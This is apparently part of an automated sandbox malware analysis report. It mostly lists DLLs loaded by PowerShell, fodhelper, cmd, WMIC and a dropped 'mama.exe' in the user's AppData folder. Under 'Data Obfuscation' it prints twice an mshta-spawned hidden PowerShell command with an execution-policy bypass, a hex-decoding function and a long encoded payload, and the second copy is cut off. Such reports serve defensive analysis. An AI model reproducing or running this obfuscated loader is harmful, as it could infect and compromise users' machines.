          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: slc.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: netapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winmmbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mmdevapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: devobj.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: ksuser.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: avrt.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: audioses.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: powrprof.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: umpdc.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: msacm32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: midimap.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: rasman.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: samcli.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: avifil32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: msvfw32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: cryptui.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wtsapi32.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: pstorec.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: propsys.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: winsta.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: firewallapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: fwbase.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: sxs.dll
          Source: C:\Users\user\AppData\Roaming\mama.exeSection loaded: fwpolicyiomgr.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: A4FY1OA97K.lnkLNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FD
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982D